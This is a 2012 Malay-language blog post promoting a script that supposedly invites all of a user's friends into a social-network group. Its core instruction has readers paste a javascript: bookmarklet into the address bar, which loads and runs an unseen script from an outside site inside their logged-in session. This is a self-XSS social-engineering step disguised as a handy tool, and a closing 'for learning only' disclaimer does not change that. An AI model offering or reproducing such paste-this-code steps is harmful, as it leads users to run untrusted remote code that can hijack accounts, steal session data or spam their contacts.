Saturday, 28 July 2012

Script Auto Invite Group


Assalamualaikum dan salam sejahtera.Hari ini aku nak share dengan korang satu script auto invite.Apa tu?
Script ni fungsi dia untuk invite semua friend korang ke dalam group korang.Best?hehe

CREDIT TO : Why So Sad DotMy & Godam Crewz

Join group : White Hat Hacker Crewz


1. Ok mula-mula masuk ke group target korang.Lepas tu copy script ni :

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://www.devilsuniverse.com/design/js/f.js';})();

2. Kemudian Paste script tu dekat ADDRESS BAR.tempat korang tulis link website tu la.
Tekan enter!


Bagi pengguna chrome macam biasa tulis javascript: terlebih dahulu sebelum paste script :)

3.ENJOY!

note : script ni berfungsi bagi semua member.walaupun bukan admin pun boleh guna :)


AMARAN! :
AKU SHARE INI UNTUK TUJUAN PEMBELAJARAN.JANGAN DISALAHGUNAKAN!


Item Reviewed: Script Auto Invite Group Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com